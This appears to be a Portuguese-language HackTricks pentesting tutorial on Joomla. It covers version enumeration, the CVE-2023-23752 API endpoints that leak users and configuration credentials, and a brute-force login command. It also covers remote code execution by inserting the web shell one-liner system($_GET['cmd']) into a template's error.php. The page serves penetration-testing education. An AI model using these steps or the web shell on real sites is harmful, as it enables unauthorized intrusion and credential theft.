# Joomla {% hint style="success" %} Aprenda e pratique AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}
Aprofunde sua experiência em **Mobile Security** com a 8kSec Academy. Domine a segurança de iOS e Android através de nossos cursos autônomos e obtenha certificação: {% embed url="https://academy.8ksec.io/" %} ### Estatísticas do Joomla O Joomla coleta algumas [estatísticas de uso](https://developer.joomla.org/about/stats.html) anônimas, como a distribuição das versões do Joomla, PHP e sistemas de banco de dados e sistemas operacionais de servidor em uso nas instalações do Joomla. Esses dados podem ser consultados através de sua [API](https://developer.joomla.org/about/stats/api.html) pública. ```bash curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool { "data": { "cms_version": { "3.0": 0, "3.1": 0, "3.10": 6.33, "3.2": 0.01, "3.3": 0.02, "3.4": 0.05, "3.5": 12.24, "3.6": 22.85, "3.7": 7.99, "3.8": 17.72, "3.9": 27.24, "4.0": 3.21, "4.1": 1.53, "4.2": 0.82, "4.3": 0, "5.0": 0 }, "total": 2951032 } } ``` ## Enumeração ### Descoberta/Mapeamento * Verifique o **meta** ```bash curl https://www.joomla.org/ | grep Joomla | grep generator ``` * robots.txt ``` # If the Joomla site is installed within a folder # eg www.example.com/joomla/ then the robots.txt file # MUST be moved to the site root # eg www.example.com/robots.txt # AND the joomla folder name MUST be prefixed to all of the # paths. [...] ``` * README.txt ``` 1- What is this? * This is a Joomla! installation/upgrade package to version 3.x * Joomla! Official site: https://www.joomla.org * Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history * Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging ``` ### Versão * Em **/administrator/manifests/files/joomla.xml** você pode ver a versão. * Em **/language/en-GB/en-GB.xml** você pode obter a versão do Joomla. * Em **plugins/system/cache/cache.xml** você pode ver uma versão aproximada. ### Automático ```bash droopescan scan joomla --url http://joomla-site.local/ ``` Em[ **80,443 - A metodologia de pentesting web é uma seção sobre scanners de CMS**](./#cms-scanners) que podem escanear Joomla. ### Divulgação de Informações Não Autenticadas pela API: Versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá despejar credenciais e outras informações. * Usuários: `http:///api/v1/users?public=true` * Arquivo de Configuração: `http:///api/index.php/v1/config/application?public=true` **Módulo MSF**: `scanner/http/joomla_api_improper_access_checks` ou script ruby: [51334](https://www.exploit-db.com/exploits/51334) ### Força Bruta Você pode usar este [script](https://github.com/ajnik/joomla-bruteforce) para tentar realizar um ataque de força bruta no login. ```shell-session sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin admin:admin ``` ## RCE Se você conseguiu obter **credenciais de admin**, você pode **RCE dentro dele** adicionando um trecho de **código PHP** para ganhar **RCE**. Podemos fazer isso **personalizando** um **template**. 1. **Clique** em **`Templates`** no canto inferior esquerdo sob `Configuration` para abrir o menu de templates. 2. **Clique** em um nome de **template**. Vamos escolher **`protostar`** sob o cabeçalho da coluna `Template`. Isso nos levará à página **`Templates: Customise`**. 3. Finalmente, você pode clicar em uma página para abrir o **código-fonte da página**. Vamos escolher a página **`error.php`**. Vamos adicionar um **PHP one-liner para ganhar execução de código** da seguinte forma: 1. **`system($_GET['cmd']);`** 4. **Salvar & Fechar** 5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id` ## De XSS a RCE * [**JoomSploit**](https://github.com/nowak0x01/JoomSploit): Script de Exploração Joomla que **eleva XSS a RCE ou Outras Vulnerabilidades Críticas**. Para mais informações, confira [**este post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Ele fornece **suporte para as Versões Joomla 5.X.X, 4.X.X e 3.X.X, e permite:** * _**Escalação de Privilégios:**_ Cria um usuário no Joomla. * _**(RCE) Edição de Templates Integrados:**_ Edita Templates Integrados no Joomla. * _**(Custom) Exploits Personalizados:**_ Exploits Personalizados para Plugins de Terceiros do Joomla.
Aprofunde sua experiência em **Segurança Móvel** com a 8kSec Academy. Domine a segurança de iOS e Android através de nossos cursos autônomos e obtenha certificação: {% embed url="https://academy.8ksec.io/" %} {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}